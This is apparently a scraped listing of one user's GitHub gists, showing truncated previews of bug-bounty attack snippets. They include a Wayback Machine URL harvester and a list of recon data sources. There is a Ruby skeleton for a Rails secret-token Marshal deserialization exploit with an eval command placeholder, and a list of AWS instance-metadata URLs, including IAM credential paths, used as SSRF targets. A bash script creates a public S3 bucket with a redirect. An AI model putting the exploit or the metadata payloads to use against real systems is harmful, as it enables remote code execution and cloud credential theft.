d1pakda5

d1pakda5

import requests
import sys
import json


def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

d1pakda5

#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
    marshal_payload = Base64.encode64(
      "\x04\x08" +
      "o" +

d1pakda5

• https://scans.io/
• https://commoncrawl.org/
• https://web.archive.org/ (For JS snippets this can be extremely handy. See killbox.sh below that was written for a HackerOne event.)
• https://www.shodan.io/
• https://opendata.rapid7.com/
• https://www.virustotal.com/en/documentation/public-api/ (You can fetch previously-scanned URLs via the API.)
• https://securitytrails.com/
• https://threatcrowd.org/
• https://dnsdumpster.com/
• https://crt.sh/

d1pakda5

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

d1pakda5

#!/bin/bash
aws s3api create-bucket --bucket $1 --acl public-read --region us-east-1
aws s3api put-bucket-website --bucket $1 --website-configuration file://redirect.jso